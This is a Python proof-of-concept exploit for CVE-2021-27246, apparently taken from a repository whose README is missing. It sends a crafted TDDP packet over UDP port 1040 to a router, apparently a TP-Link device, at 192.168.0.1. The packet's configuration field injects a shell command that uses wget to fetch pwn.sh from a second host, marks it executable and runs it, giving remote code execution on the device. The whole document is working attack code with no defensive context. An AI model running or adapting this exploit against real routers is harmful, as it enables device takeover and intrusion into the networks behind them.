README.md
README.md not found for CVE-2021-27246. The file may not exist in the repository.
#!/usr/bin/env python3
import hashlib
import socket
import logging
TARGET = "192.168.0.1"
PORT = 1040
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('tdp')
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
TDDPCMD = {
'tddp_cmd_spCmd': b'\x03',
'sysinit': b'\x05',
'nil': b'\x00',
'ff': b'\xff',
'tddpv1_sysinit': b'\x0c',
'tddpv1_configset': b'\x31'
}
CMD = {
'tddp_cmd_setOemID' :b'\x00\x00\x3c\x00',
'nil' :b'\x00\x00\x00\x00',
'tddp_cmd_setCountrycode' :b'\x00\x00\x43\x00'
}
def hash_and_send(p):
if p[0] == '\x02':
h = hashlib.md5(p[0:0x1c]).digest()
pp = p[0:12]+h+p[28:]
else:
pp = p
sock.sendto(pp, (TARGET, PORT))
def receive():
resp,server = sock.recvfrom(4096)
print(resp.hex())
def create_pkt_v1(tddpcmd, cmd='nil', data=b'', version=b'\x01', unknow_b=b'\x00\x00', enc=b'\x00\x00\x00\x00'):
packet = version + TDDPCMD[tddpcmd] + unknow_b + enc + CMD[cmd] + data
return packet
def configsetv1_inject():
log.info("Preparing tddpv1_configset payload")
p = create_pkt_v1('tddpv1_configset', data=b'AB||wget http://192.168.0.100:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh;A')
log.info("Sending payload")
hash_and_send(p)
receive()
configsetv1_inject()